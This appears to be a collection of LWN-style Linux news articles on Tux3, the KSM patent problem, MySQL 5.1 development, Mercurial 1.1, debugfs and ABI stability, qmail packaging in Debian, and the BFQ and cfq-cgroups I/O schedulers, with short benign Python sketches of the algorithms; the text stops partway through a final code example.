	I consider the spectre of disks passing bad data as good to be
	largely vendor FUD. That said, checksumming will likely appear in
	the feature list at some point, I just consider it a decoration,
	not an essential feature.


Tux3 development is far from the point where the developers can worry about
"decorations"; it remains, at this point, an embryonic project being pushed
by a developer with a bit of a reputation for bright ideas which never
quite reach completion.  The code, thus far, has been developed in user
space using FUSE.  There is, 
however, an in-kernel version
which is now ready for further development.  According to Daniel:


	The functionality we have today is roughly like a buggy Ext2 with
	missing features.  While it is very definitely not something you
	want to store your files on, this undeniably is Tux3 and
	demonstrates a lot of new design elements that I have described in
	some detail over the last few months.  The variable length inodes,
	the attribute packing, the btree design, the compact extent
	encoding and deduplication of extended attribute names are all
	working out really well.


The potential user community for a stripped-down ext2 with bugs is likely
to be relatively small.  But the Tux3 design just might have enough to
offer to make it a contender eventually.  

First, though, there are a few little
problems to solve.  At the top of the list, arguably, is the complete lack
of locking - locking being the rocks upon which other filesystem projects
have run badly aground.  The code needs some cleanups - little problems
like the almost complete lack of comments and the use of macros as formal
function parameters  are likely to raise red flags on wider review.  Work
on an fsck utility does not appear to have begun.  There has been no real
benchmarking work done; it will be interesting to see how Daniel can manage
the "never overwrite a block" policy in a way which does not fragment files
(and thus hurt performance) over time.  And so on.


That said, a lot of these problems could end up being resolved rather
quickly. Daniel has put the code out there and appears to have attracted an
energetic (if small) community of contributors.  Tux3 represents the core
of a new filesystem with some interesting ideas.  Code comments may be
scarce, but Daniel - never known as a tight-lipped developer - has posted a
wealth of information which can be found in the Tux3
mailing list archives.  Potential contributors should be aware of Daniel's licensing scheme - GPLv3 with a
reserved unilateral right to relicense the code to anything else - but
developers who are comfortable with that are likely to find an interesting
and fast-moving project to play in.

		KSM runs into patent trouble


On the kernel page a few weeks ago, we took a look at KSM, a technique to
reduce memory usage by sharing identical pages.  Currently proposed for
inclusion in the mainline kernel, KSM implements a potentially
useful—but not particularly new—mechanism.  Unfortunately,
before it can be examined on its technical merits, it may run afoul of what
is essentially a political problem: software patents. 


The basic idea behind KSM is to find memory pages that have the same
contents, then arrange for one copy to be shared amongst the various
users.  The kernel does some of this already for things like shared
libraries, but there are numerous ways for identical pages to get created
that the kernel does not know about directly, thus cannot coalesce.
Examples include initialized memory (at startup or in caches) from
multiple copies of the same program and virtualized guests that are running
the same operating system and application programs. 


Unfortunately, as Dmitri Monakhov points out, the KSM technique
appears to be patented by
VMware.  A patent for "Content-based, transparent sharing of memory
units" was filed in July 2001 and granted in September 2004.  The abstract
seems to clearly cover the ideas behind KSM:
[...] The context, as opposed to merely
the addresses or page numbers, of virtual memory pages that [are]
accessible to 
one or more contexts are examined. If two or more context pages are
identical, then their memory mappings are changed to point to a single,
shared copy of the page in the hardware memory, thereby freeing the memory
space taken up by the redundant copies. The shared copy is ten preferable
[sic] 
marked copy-on-write. Sharing is preferably dynamic, whereby the presence
of redundant copies of pages is preferably determined by hashing page
contents and performing full content comparisons only when two or more
pages hash to the same key. 


It should be noted that the abstract has no legal bearing; that comes from
the—always tortuously worded—claims, which can be seen at the
link above.  In this case, as far as
can be determined, the claims and abstract are in close agreement.
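For readers who want to see the general technique spelled out, here is a small user-space model of it: hash each page, do a full comparison only when hashes match, and point duplicates at a single shared copy. It is neither the KSM patch nor mergemem; the function name, the use of SHA-1, and the dictionary standing in for page tables are all choices made for this sketch.

```python
import hashlib


def share_identical_pages(pages):
    """Map each page id to the id of the shared copy it should point to.

    `pages` is a dict of page id -> bytes.  In a real system the shared
    copy would also be marked copy-on-write; that step is not modeled here.
    """
    by_hash = {}   # digest -> ids of distinct pages seen with that digest
    mapping = {}
    for page_id, contents in pages.items():
        digest = hashlib.sha1(contents).digest()
        for candidate in by_hash.setdefault(digest, []):
            # Full comparison, done only when the hashes match.
            if pages[candidate] == contents:
                mapping[page_id] = candidate
                break
        else:
            # No identical page seen yet: this one becomes a shared copy.
            by_hash[digest].append(page_id)
            mapping[page_id] = page_id
    return mapping
```

The number of page frames saved is the number of pages minus the number of distinct values in the returned mapping.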


The dates above are rather important because there is some "prior art" to
consider, namely the mergemem patch
first announced
in March of 1998.  It is substantially the same as the patented idea: it
looks for identical "context pages", then changes the memory mappings to
point to a single copy-on-write page.  This would seem to be a clear
example of the idea being implemented well before the patent was filed, so
it should invalidate the patent.  As with everything surrounding
software patents, though, it isn't as easy as that.


In order to invalidate a patent, either a court must rule that way or the
patent office must be convinced to re-examine it, then find that the prior
art makes it invalid.  Both of these methods
take time and usually money and lawyers as well.  Free software projects
may have time, but the other two are typically out of reach.  Alan Cox suggests that "perhaps the
Linux Foundation and 
some of the patent busters could take a look at mergemem and
re-examination".   While that might eventually resolve the problem,
it is a multi-year process at best.


The folks behind the KSM project are some of the kvm hackers from
Qumranet—which is now part of Red Hat.  It is certainly conceivable
that VMware might consider kvm a competitor and try to use this patent as a
"competitive" weapon.  That concern is probably enough to keep KSM out of
the mainline until the issue is resolved.


There is a much quicker resolution available should VMware wish to pursue it.
As IBM has done with the RCU patent, VMware could license its patent for
use in GPL-licensed code.  There is much to be gained by doing that, at
least in terms of positive community relations, and there is little to be
lost—unless VMware truly believes that the patent will stand up to
scrutiny.  Both VMware and its parent, EMC, are members of the Linux
Foundation, so one could see a role for the foundation in helping to put
that kind of agreement together.


The original mergemem idea did not make it into the kernel, but the code is
still available for those running Linux 2.2.9.  It appears that it was not
pushed very 
hard in the face of some security concerns—which will need to be
addressed by KSM as well.  Processes could create a page of memory with
known contents then, after waiting for the checker process (or kernel
thread) to run, see if memory usage has increased.  Based on that
information, one can determine if other processes have a page with
identical values.  It would seem rather difficult to exploit, but clearly
does allow some information to leak.


It will come as no surprise to most LWN readers that software patents are an
increasingly dense minefield that can derail free software projects.
Unfortunately, it is the kind of problem that has no solution in the
technical domain where such projects excel.  The political arena is where
any solution will have to come from, though there seems to be some hope
that judicial opinions (like the Bilski decision) may limit the scope of
the damage.  It is a problem that we are likely to see more frequently
until there is some kind of resolution.


		MySQL 5.1 and development models


The MySQL development team decided to celebrate the (US) Thanksgiving
holiday with the release of MySQL
5.1.30, the first "general availability" (read "production-ready")
release in the 5.1 series.  There is a lot of good stuff in 5.1.30,
including table partitioning, row-based replication, a new plugin API, a
built-in job scheduler, and more; see the
nutshell summary for more information.  It's a celebration point for a
long development series; the MySQL developers are to be congratulated for
what they have accomplished with this release.

Behind the celebration, though, one can hear the grumbling from unhappy
developers and users.  This release has been a long time in coming; the
first 5.0 GA release was in October, 2005 - just over three years ago.  The
first 5.1 release candidate (5.1.22) came out in September,
2007; seven more "release candidates," many with major changes, were
announced over the following 14 months.  So the 5.1 production release
came rather later than desired, but some developers feel that it was still too
soon; the complaints reached a climax in this
lengthy posting from Michael "Monty" Widenius, the original creator of
MySQL.  His point of view, in short, is that this release has fatal bugs,
and that these bugs come from a number of flaws in how MySQL development is
managed.

Your editor cannot claim to be an expert on the MySQL development
community.  But Monty, presumably, is an expert on this community,
so his observations have a higher than usual likelihood of reflecting
something close to reality.  Reading various dissenting posts (example)
has done little to make your editor feel otherwise. 
And, in any case, much of what Monty says rings true when compared against
experiences from elsewhere in the free software community.  As projects
grow, they must occasionally revisit their development models.  There is
little happening here which is truly unique to MySQL.

Monty asserts:


	MySQL 5.1 was declared beta and RC way too early. The reason MySQL
	5.1 was declared RC was not because we thought it was close to
	being GA, but because the MySQL manager in charge *wanted to get
	more people testing MySQL 5.1*. This didn't however help much,
	which is proved by the fact that it has taken us 14 months and 7
	RC's before we could do the current "GA". This caused problems for
	developers as MySQL developers have not been able to do any larger
	changes in the source code since February 2006! 


Two things jump out of that statement.  One is that MySQL apparently
suffers from an inadequate testing community.  Needless to say, that
is not a problem which is unique to this project; testing is a scarce
resource throughout our community.  MySQL users who are unhappy with the
results of the development process might want to ask themselves if they are
doing enough to help with the testing process.  Like it or not, testing
software and finding bugs is one of the costs of "free" (beer) software.
If this testing doesn't happen during the development cycle, it will end up
happening with the "stable" releases instead.

The other attention-getter above is the statement that MySQL developers
have been unable to make major changes since early 2006.  One need only
think back to the 2.4 kernel days to see the kind of damage that can result
from pent up "patch pressure."  Developers get frustrated, major changes
start to find their way into "release candidate" code, and the number of
bugs tends to increase.  The existence of a separate MySQL 6
development branch helps, perhaps, in reducing patch pressure, but it can
also only serve to distract developers from stabilizing current release
candidates.

Related to this is another assertion:


	Too many new developers without a thorough knowledge of the server
	have been put on the product trying to fix bugs. This in combined
	with a failing review process have introduced of a lot new bugs
	while trying to fix old bugs.


Review would appear to be a big part of the problem in general.  It may
well be that a failure of review has caused the introduction of new bugs
with fixes.  But one could argue that the problem is deeper than that: any
code which failed to stabilize over fourteen months of release candidates
should, almost certainly, never have been merged into the MySQL trunk to begin
with.  It seems that there are not enough eyeballs being applied to major
new features before they go in.  

Your editor has resisted the temptation to
make comparisons with other relational database manager projects, but
there is value in comparing this state of affairs with the review problems faced by
PostgreSQL in recent years.  An inability to get additions to
PostgreSQL properly reviewed has resulted in those additions not being
merged.  That, in turn, leads to delayed releases with fewer than the
desired number of features,
neither of which is particularly pleasing for users or developers.  But, on
the other hand, PostgreSQL does not appear to have the same kind of trouble
stabilizing its major releases.

Perhaps the key point to take away from all of this, though, is here:


	In addition, the MySQL current development model doesn't in
	practice allow the MySQL community to participate in the
	development of the MySQL server. 


MySQL is very much a corporate-owned, corporate-driven project, and it has
been for a long time.  Decisions on what to include are made internally;
there is little discussion of development decisions on the project's
mailing lists.  It is hard to find information on how to contribute to the
project; some
of the available information still tells prospective contributors to
use BitKeeper.  All code is copyrighted by MySQL (now Sun), which reserves
(and uses) a right to distribute that code under proprietary licenses.  


All of the above reflects an arrangement which has worked well for years,
and which has produced an immensely valuable database manager used
by vast numbers of people.  But it is not a community
project, so development decisions will not necessarily reflect the best
interests of the wider user or developer communities.  If, as Monty suggests,
those decisions are made in ways which favor features and deadlines over
quality, there will be little that the community can do about it.

		Mercurial 1.1 - a major feature release


The Mercurial project is described as
"a fast, lightweight Source Control Management system designed for efficient handling of very large distributed projects."
The Major Features document presents an overview of Mercurial's
capabilities, and Understanding Mercurial
explains how Mercurial works as a distributed source control system.


Mercurial version 1.1 was announced this week:
"This is a major release with numerous new features."


The What's New document explains the many changes made in
Mercurial 1.1.
Highlights include a new resolve command for tracking in-progress
merges, a new repository format, performance improvements, support for
Python 2.6, bug fixes and work on the documentation.
The web interface now has a canvas-based repository graph, new themes,
improved WSGI compliance, support for the display of nested repositories
and other improvements.


The Mercurial commands have gone through numerous improvements and
extensions, and some bugs have been fixed.
Several new extensions have been added to Mercurial 1.1, including
a rebase extension for rebasing changesets, a bookmarks extension
for providing git-like branches, a zeroconf extension for publishing
repositories, and an hgcia extension for communicating with
CIA.
Some of the existing extensions have also been improved.
Version 1.2 of the Mercurial plugin for the
Eclipse IDE was also announced this week.


According to Wikipedia, Mercurial was started in 2005 and the software is
being used by such high-profile projects as
Mozilla, OpenSolaris and Xen.  This latest release shows that
the code continues to undergo active development and that Mercurial holds
an important place in the world of source code control systems.


		Debugfs and the making of a stable ABI


Remi Colinet recently proposed the addition
of a new virtual file, /proc/mempool, which would display the
usage of memory pools within the kernel.  Nobody really disagreed with the
idea of making this information available, but there were some grumbles
about putting it into /proc.  Once upon a time, just about
anything could go into that directory, but, in recent years, there has been
a real attempt to confine /proc to its original intent: providing
information about processes.  /proc/mempool is not about
processes, so it was considered procfile-non-grata.  It was suggested that
another home should be found for this file.

Where that other home should be is not obvious, though.  Somewhere like
/sys/kernel might seem to make sense, but sysfs has rules of its
own.  In particular, the one-value-per-file rule makes it hard to create an
easy file 
where developers can simply query the state of a kernel subsystem, so sysfs
is not a suitable home for this file either.

The next option is debugfs, which was created in December, 2004.
Debugfs is meant to be an aid for kernel developers; it explicitly
disclaims any rules on the types of files that can be put there.  All rules,
that is, except for one: debugfs is not a mandatory part of any kernel installation,
and nothing found therein should be considered to be a part of the stable
user-space ABI.  It is, instead, a dumping ground where kernel developers
can quickly export information which is useful to them.

Since debugfs is not a part of the user-space ABI, it seems like a poor
place to put things that users might depend on.  When this was pointed out,
it became clear that the non-ABI status of debugfs is not as well
established as one might think.  Quoting Matt
Mackall:


	The problem with debugfs is that it claims to not be an ABI but it
	is lying. Distributions ship tools that depend on portions of
	debugfs. And they also ship debugfs in their kernel. So it is
	effectively the same as /proc, except with the 1.0-era
	everything-goes attitude rather than the 2.6-era
	we-should-really-think-about-this one.

	Pushing stuff from procfs to debugfs is thus just setting us up for
	pain down the road. Don't do it. In five years, we'll discover we
	can't turn debugfs off or even clean it up because too much relies
	on it.


As an example, Matt pointed out the extensively-documented usbmon interface which
provides a great deal of information about what's happening on a USB bus.
If it is not an ABI, he says, nobody should be upset if he submits a patch
which breaks it.

That is a perennial problem with interfaces between the kernel and user
space; changing them causes 
pain for users.  That is why incompatible changes to user-space interfaces
are almost never allowed;
an important goal for the kernel development process is to avoid breaking
user-space programs.  One might think that this problem could be avoided
for a specific interface by explicitly documenting it as an unstable
interface.  The files in Documentation/ABI/testing are meant to serve that
role; anything found there should be considered to be unstable.  But, as
soon as people start using programs which depend on a specific interface,
it has, for all practical purposes, hardened into part of the kernel ABI. 

Linus put it this way:


	The fact that something is documented (whether correctly or not)
	has absolutely _zero_ impact on anything at all. What makes
	something an ABI is that it's useful and available. The only way
	something isn't an ABI is by _explicitly_ making sure that it's not
	available even by mistake in a stable form for binary use.

	Example: kernel internal data structures and function calls. We
	make sure that you simply _cannot_ make a binary that works across
	kernel versions.  That is the only way for an ABI to not form.


So a given kernel interface can be kept away from ABI status if it is so
hard to get to, and so unstable, that nothing ever comes to depend on it.
The kernel module interface certainly fits this bill.  Modules must
generally be built for the exact kernel they are intended to work with, and
they must often be built with the same configuration options and the same
compiler.  Anybody who has gotten into the dark business of distributing
binary-only modules has learned what a challenge it can be.

Debugfs is different, though.  It is enabled in a number of distributor
kernels, even if, perhaps, it is not mounted by default.  Once a set of
files gets placed there, their format tends to change rarely.  So it is
possible for people to write programs which depend on debugfs files.  And
the end result of that is that debugfs files can become part of the stable
kernel ABI.  That is generally not a result that was intended by anybody
involved, but it happens anyway.  The only way to avoid it would be to
deliberately shake up debugfs every kernel cycle - and few developers have
much desire to do that.

This is a discussion without a whole lot in the way of useful conclusions;
it leaves /proc/mempool without a home.  ABI design, it turns out,
is still hard.  In the longer term, dealing with an ABI which was never
really designed, but which just sort of settled into being, is even
harder.  There does not appear to be any substitute for thinking seriously
about every interface between kernel and user space, even if it's just for
a developer's debugging tool.

		Packaging qmail for Debian


An effort to get the qmail mail transfer agent (MTA) into
Debian repositories has run aground due to various concerns, but the
overriding one seems to be a distaste for qmail itself.  Distributions make
package availability decisions based on "taste" all the time, but they are
generally made strictly on technical grounds, which does not seem to be the
case here. While it
has its share of detractors, qmail is a relatively popular MTA—with
an excellent security track record—and one of the main impediments,
its license, has changed in the last year. That makes it a bit hard
to understand why qmail would be kept out of Debian.


More than six months ago, Gerrit Pape had uploaded qmail and related
packages to the ftp-master system, but they have yet to be added to the
official Debian archive.  He recently outlined his efforts in a
post to debian-devel trying to see if he
could break a kind of standoff between him and the ftpmasters, who are the
folks that decide which
packages get moved into the official archives.  More than two months after
his first upload of the packages, Pape got a reply from Joerg Jaspert outlining multiple
technical reasons why the packages were being opposed, but also containing
the following disheartening verdict:

Aside from these technical - and possibly fixable - problems, we (as in the
ftpteam) have discussed the issue, and we are all of the opinion that qmail
should die, and not receive support from Debian. As such we *STRONGLY*
ask you to reconsider uploading those packages.


After that, Pape addressed some, but not all, of the technical complaints
and uploaded updated packages along with a reply
to Jaspert's rejection on September 1.  Since that time, there has been no
action on the packages 
nor any further communication from the ftpteam, which is what led to the
debian-devel post.  Responses there mostly backed the ftpmasters'
"decision"; qmail, it seems, is not very popular with many Debian developers.


Unfortunately, some of the complaints are based on old or faulty
information.  There is a reasonably active upstream and, since Daniel
J. Bernstein (aka djb) released the code into the public domain, there is
no longer the need to patch qmail to get a sensible MTA.  There are some
legitimate concerns, in particular the backscatter that gets created by the
default qmail configuration, but it is rather disingenuous to list security
as one of those problems. 


While not as bulletproof as djb would have it,
qmail does have a long record of few security problems.  In response to
claims that the Debian security team would have more work because of
qmail's inclusion, Moritz Muehlenhoff makes it
clear that the team won't block qmail.  Florian Weimer puts it this way:

Like Moritz, I don't see issues with security support, provided that
the number of additional patches is rather small.  (To my knowledge,
badly patched qmail with a SMTP AUTH bypass vulnerability was one of
the few MTAs which were actually exploited to send spam in recent
times.)  I'm also not sure if upstream can be considered dead, and
arguments along that line are not very convincing because similar
criticism could be brought against our default MTA.

I can understand that people have strong feelings.  I'm willing to
provide security support, but it's extremely unlikely that I'll run
qmail on production MTAs ever again. 8-/


In the end, it comes down to emotions, largely.  People generally feel
strongly about qmail, either hating it or loving it, with few who know much
about it anywhere in between.  Clearly the ftpteam has the responsibility
to reject packages on technical grounds, but are they the arbiters of taste
for Debian as well?


An earlier thread
about including qmail, from shortly after djb freed the code, showed a
fair amount of interest in qmail, along with some opposition.  It is
unlikely that all Debian developers are happy with all of the packages
currently supported by the distribution, so singling qmail out seems rather
arbitrary.  As Wouter Verhelst notes:

As long as qmail is free, packaged
properly, and integrates well with the rest of Debian, I don't see why
anyone should oppose its packaging.

Whether or not it's a good MTA, the fact is that it's a *popular* MTA.
That alone should be a good reason to package it.


Installing qmail has always been painful; it is a package that cries out
for distribution integration, which Pape is trying to provide.  Whether it
gets into the official repositories or not, unofficial qmail packages do
exist.  If the problems with qmail are largely packaging-related, it is
hard to see how they will get fixed by staying unofficial.  But if the problems
are based on an emotional response to qmail itself—whether based in
technical concerns or not—it is hard to see how a developer can
overcome them.  


		Variations on fair I/O schedulers


An I/O scheduler is a subsystem of the kernel which schedules I/O
operations to
the various storage devices to get the best possible throughput from those
devices.
The algorithm is often reminiscent of the algorithm used by elevators when
dealing with requests coming from different floors to go up or down.
This is the reason I/O scheduling algorithms are also called
"elevators." I/O requests are submitted in an order designed to minimize
disk head movement (thus minimizing disk seek times), yet guaranteeing
good I/O rates. The next request chosen will be dependent on the current
disk head position, in order to service the requests quickly, and spend
less time seeking, or moving the disk head. However, algorithms
may also consider other aspects such as fairness or time guarantees. 

The Completely Fair Queuing (CFQ) I/O scheduler is one of the most popular I/O
scheduling algorithms; it is used as the default scheduler in most
distributions. As the name suggests, the CFQ scheduler tries to
maintain fairness in its distribution of bandwidth to processes without
compromising much on throughput. The elevator's fairness is
accomplished by servicing all processes and not penalizing those
which have requests far from the current disk head position.
It grants a time slice to every process;
once the task has consumed its slice, the slice is recomputed and the task is
added to the end of the queue.
The I/O priority is used to compute the time slice granted and the offset
in the request queue.

The Budget Fair Queuing scheduler

The time-based allocation of the disk service in CFQ, while having
the desirable effect of implicitly charging each application for
the seek time it incurs, still suffers from fairness problems, especially
towards processes which make the best possible use of the disk bandwidth.
If the same time slice is assigned to two processes,
they may each get different throughput, as a function of the
positions on the disk of their requests.  Moreover, due
to its round robin policy, CFQ is characterized by an O(N) worst-case
delay (jitter) in request completion time, where N is the number
of tasks competing for the disk.  

The Budget Fair Queuing (BFQ) 
scheduler, developed by Fabio Checconi and Paolo Valente,
changes the CFQ round-robin scheduling policy based on time slices into a
fair queuing policy based on sector budgets.  Each task is assigned a budget
measured in number of sectors instead of amount of time, and budgets
are scheduled using a slightly modified version of the Worst-case Fair
Weighted Fair Queuing+ (WF2Q+) algorithm (described in this paper
[compressed PS]), which
guarantees a worst case complexity of O(logN) and boils down to O(1)
in most cases. The budget assigned to each task varies over time as a
function of its behavior.  However, one can set the maximum value of
the budget that BFQ can assign to any task.

BFQ can provide strong guarantees on bandwidth distribution because the
assigned budgets are measured in sectors. There are limits, though: a process
which takes too long to exhaust its budget is penalized, and the scheduler
moves on to the next process with I/O to dispatch. The next budget is
calculated from the feedback provided by the requests just serviced.

BFQ also introduces I/O scheduling within control groups. Queues are collected
into a tree of groups, and there is a distinct B-WF2Q+ scheduler on each
non-leaf node. Leaf nodes are request queues as in the
non-hierarchical case. BFQ supports I/O priority classes at each hierarchy
level, enforcing a strict priority ordering among classes. This means
that idle queues or groups are served only if there are no best effort
queues or groups in the same control group, and best effort queues and groups are
served only if there are no real-time queues or groups. Compared to
cfq-cgroups (explained later), it lacks per-device priorities. The
developers claim, however, that this feature could be incorporated easily.

Algorithm

Requests coming to an I/O scheduler fall into two categories,
synchronous and asynchronous. Synchronous requests are those for which
the application must wait before continuing to send further
requests - typically read requests. On the other hand, asynchronous
requests - typically writes - do not block the application's progress while
they are executed.
In BFQ, as in CFQ, synchronous requests are collected in per-task queues, while
asynchronous requests are collected in per-device (or, in the case of
hierarchical scheduling, per group) queues. 

When the underlying device
driver asks for the next request to serve and there is no queue being
served, BFQ uses B-WF2Q+, a modified version of WF2Q+, to choose a
queue. It then selects the first request from that queue in C-LOOK order
and returns it to the driver. C-LOOK is a disk scheduling algorithm,
where the next request picked is the one with the immediate next highest
disk sector to the current position of the disk head. Once the disk 
has serviced the maximum sector number in the request queue, it
positions the head to the sector number of the request having the
lowest sector number.
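
The C-LOOK ordering described above can be sketched in a few lines of Python. This is only an illustration of the ordering rule, not code from BFQ; the function name is hypothetical, and it assumes that a request located exactly at the head position counts as "next."

```python
from bisect import bisect_left

def c_look_order(pending_sectors, head):
    """Return the order in which C-LOOK would serve the pending sectors."""
    ordered = sorted(pending_sectors)
    # Requests at or beyond the head position are served first, in
    # ascending order (assumption: "at the head" counts as ahead of it).
    split = bisect_left(ordered, head)
    # After the highest pending sector is served, the head jumps back to
    # the lowest pending sector and sweeps upward again.
    return ordered[split:] + ordered[:split]

print(c_look_order([98, 183, 37, 122, 14, 124, 65, 67], head=53))
```

The head only ever sweeps in one direction; the jump back to the lowest sector is the price paid for treating all positions on the disk more evenly.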

When a new queue is selected it is assigned a budget, in disk sector
units, decremented each time a request from the same queue is served.
When the device driver asks for new requests and there is a queue
under service, they are chosen from that queue until one of the
following conditions is met: (1) the queue exhausts its budget,
(2) the queue is spending too much time to consume its budget, or
(3) the queue has no more requests to serve.
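
As a rough sketch of that service loop, consider the Python below. It is not taken from the BFQ patch: the function and the reason strings are hypothetical, requests are represented simply by their size in sectors, and "exhausting the budget" is assumed to mean that the next request would not fit into what remains.

```python
from collections import deque

def serve_queue(requests, budget, timeout, service_time):
    """Serve requests from one queue until a stop condition is met.

    requests:     deque of request sizes, in sectors
    budget:       number of sectors the queue may consume this turn
    timeout:      maximum total service time allowed for the turn
    service_time: function mapping a request size to the time it takes
    Returns (list of served request sizes, reason for stopping).
    """
    served, elapsed = [], 0.0
    while True:
        if not requests:
            return served, "no more requests"      # condition (3)
        if elapsed >= timeout:
            return served, "timeout"               # condition (2)
        if requests[0] > budget:
            return served, "budget exhausted"      # condition (1), as assumed above
        size = requests.popleft()
        budget -= size                             # budget is charged in sectors
        elapsed += service_time(size)
        served.append(size)

print(serve_queue(deque([8, 8, 8, 8]), budget=20, timeout=100.0,
                  service_time=lambda size: 1.0))
```

Charging the budget in sectors while bounding the turn in time is what lets a sequential reader use its whole budget quickly while a seeky one is cut off by the timeout.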

On completion of a request, the scheduler recalculates the
budget allocated to each process depending on the feedback it gets.
For example, a greedy process which has exhausted its budget
gets a larger budget, whereas a process which has been idle for a long time
has its budget decreased. The maximum budget a process can get is a
configurable system parameter (max_budget).
Two other parameters, timeout_sync and timeout_async,
control the timeout time for consuming the budget of the synchronous and
asynchronous 
queues respectively. In addition, max_budget_async_rq limits the
maximum number of requests serviced from an asynchronous queue.
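
The feedback idea can be illustrated with a small Python sketch. Only the direction of the adjustment and the max_budget cap come from the description above; the doubling and halving steps, the function name, and the reason strings are assumptions made for the example, and the real heuristics are certainly more involved.

```python
def next_budget(current, reason, max_budget, step=2):
    """Pick the budget for a queue's next turn from how its last turn ended.

    reason is a hypothetical label: "budget exhausted", "timeout",
    or "no more requests" (the queue went idle).
    """
    if reason == "budget exhausted":
        # A greedy queue used everything it was given: grant more,
        # but never more than the configured maximum.
        return min(current * step, max_budget)
    if reason in ("timeout", "no more requests"):
        # A slow or idle queue did not use its budget: grant less,
        # but keep the budget at one sector or more.
        return max(current // step, 1)
    return current

print(next_budget(1024, "budget exhausted", max_budget=4096))
```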

If a synchronous queue has no more requests to serve, but it has
some budget left, the scheduler idles (i.e., it tells the device
driver that it has no requests to serve even if there are other active
queues) for a short period, in anticipation of a new request from the task
owning the queue.

Test Results

The developers compared six different I/O scheduling algorithms:
BFQ, YFQ,
SCAN-EDF, CFQ, the Linux anticipatory scheduler, and C-LOOK.
They ran a multitude of tests modeled on
real-life scenarios, measuring throughput, bandwidth distribution,
latency, and short-term time
guarantees. With respect to bandwidth distribution, BFQ came out
as the best, and it appears to be a good algorithm for most scenarios.
There were also extensive tests comparing BFQ against CFQ, and the
results are available here.
The throughput of BFQ is more or less the same as that of CFQ, but it does well at
distributing I/O bandwidth fairly among the processes, and it displays
lower latency with streaming data.

Using sector budgets, rather than time slices, as the basis
for fair bandwidth distribution is an interesting concept.
The algorithm also employs timeouts to cut off and penalize "seeky"
processes which take too much time to consume their budgets.
The feedback from current requests helps determine future
budgets, making the algorithm self-learning. Such tight bandwidth
distribution would be a requirement for systems running virtual
machines, or container classes. It remains to be seen, however, how BFQ stands
the test of time against the tried-and-tested, stable CFQ.

See the
BFQ technical report [PDF] for (much) more information.


Expanded CFQ

Control Groups provide a mechanism for aggregating sets of tasks, and
all their future children, into hierarchical groups. These groups can
be allocated dedicated portions of the available resources, or
resource sharing can be prioritized within these groups. Control
groups are controlled by the cgroups pseudo-filesystem. Once mounted,
the top level directory shows the complete set of existing control
groups. Each directory created
under the root of that filesystem creates a new group, and resources can be
allocated to the tasks listed in the tasks file in the individual
group's directory.

Control groups can be used to regulate access to CPU time, memory, and
more.  There are also several projects working toward the creation of I/O
bandwidth controllers for control groups.
One of those is
the expanded CFQ scheduler
patch for cgroups by Satoshi Uchida.

This patch set introduces a new I/O scheduler called cfq-cgroups,
which brings control group support to the I/O scheduling subsystem.
This scheduler, as
the name suggests, is based on the Completely Fair Queuing I/O scheduler.
It can take advantage of hierarchical scheduling of
processes, with respect to the cgroup they belong to, each cgroup
having its own CFQ scheduler.
I/O devices in a control group can be prioritized. The time slice
given to each hierarchical group per device is a function of the device
priority. This helps to shape I/O bandwidth per group and per device.

Usage

To use cfq-cgroups, select it as the default scheduler at
boot by passing elevator=cfq-cgroups as a boot parameter.
The scheduler can also be changed dynamically for individual devices by writing
cfq-cgroups to /sys/block/<device>/queue/scheduler.
There are two levels of control:
through the cgroups filesystem, for individual groups, and
through sysfs, for individual devices.
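
The per-device switch is nothing more than a write to a sysfs file, which can be sketched in Python as follows. The helper name and its sys_block parameter are hypothetical (the parameter exists so the function can be pointed at a scratch directory); on a real system the write requires root, and it only succeeds if the running kernel actually offers the named scheduler.

```python
from pathlib import Path

def set_scheduler(device, name, sys_block="/sys/block"):
    """Select an I/O scheduler for one block device by writing to sysfs."""
    path = Path(sys_block) / device / "queue" / "scheduler"
    # The kernel parses the scheduler name written to this file.
    path.write_text(name + "\n")
    return path

# Example (as root, on a kernel with the patch applied):
#   set_scheduler("sda", "cfq-cgroups")
```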

Like any other control group, cfq-cgroup is managed through the
cgroup pseudo-filesystem.
To access the cgroups, mount the pseudo cgroups filesystem:


The cgroup directory, by default, will have a file called
cfq.ioprio, which contains  the
individual priority on a per-device basis. The time slice received per
device per group is a function of the I/O priority listed in cfq.ioprio.
The tasks file represents the list of tasks in the particular group.
To make more groups, create a directory in the mounted cgroup
directory:


The new directories are automatically populated with files
(cfq.ioprio, tasks, and so on) which are used to control the
resources in this
group. To add a task to a group, write the process ID of the task to the
tasks file:
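
In Python terms, creating a group and moving a task into it come down to a mkdir and a write. This is a sketch under assumptions: the helper names are hypothetical, the cgroup filesystem is assumed to be mounted already at whatever path the caller passes in, and on a real cgroup mount the kernel creates the tasks file itself when the directory is made.

```python
from pathlib import Path

def create_group(cgroup_root, name):
    """Create a new control group as a directory under the cgroup mount."""
    group = Path(cgroup_root) / name
    group.mkdir()
    return group

def add_task(group_dir, pid):
    """Move a task into a group by writing its process ID to the tasks file."""
    (Path(group_dir) / "tasks").write_text(f"{pid}\n")

# Example, with a hypothetical mount point:
#   group = create_group("/mnt/cgroup", "group1")
#   add_task(group, 1234)
```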


The cfq.ioprio file contains the list of devices and their respective
priorities. Each device in the cgroup has a default I/O priority of 3,
while the valid values are 0 to 7. To change the priority of a device for
the cgroup group1, run:


This would change the priority of the entire group. To change the I/O
priority of a specific device:


To change the default priority while keeping the priority of the
devices unchanged:


The device view shows the list of cgroups and their respective
priorities on a per-group basis. This can be changed by:


The device view contains other parameters similar to those of the CFQ scheduler,
such as back_seek_max or back_seek_penalty, which
control the individual device just as they do in the traditional
CFQ.

Implementation

The patch introduces a new data structure called cfq_driver_data
for the 
control of I/O bandwidth for cgroups. All driver-related data has been
moved from the traditional cfq_data structure to
cfq_driver_data structure. Similarly, cfq_cgroups is a new data
structure to control 
the cgroup parameters. The organization of the data can be viewed as
a matrix with cfq_cgroups as rows and cfq_driver_data as
columns, as
shown in the diagram below.


At each intersection, there is a cfq_data
structure which is responsible for all CFQ-related queue handling, so
that each cfq_data corresponds to one cfq_cgroup and
cfq_driver_data combination.

When a new cgroup is created, the  cfq_data from
the parent cgroup is copied into the new group.  While inserting new nodes
of cfq_data into the 
cgroup, the cfq_data structure is initialized with the priority of
the cfq_cgroup.
This way all data of the parent is inherited by the child cgroup, and
shows up in the respective files per group in the cgroup filesystem.
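
The matrix arrangement and the inheritance of parent settings can be modeled with a dictionary keyed by (cgroup, device) pairs. The Python below is a conceptual sketch only; the class and field names are hypothetical and do not mirror the kernel structures, and the default priority of 3 is the one quoted earlier.

```python
from dataclasses import dataclass, field

DEFAULT_IOPRIO = 3  # default per-device priority mentioned in the text

@dataclass
class CfqData:
    """Queue state for one (cgroup, device) pair; fields are illustrative."""
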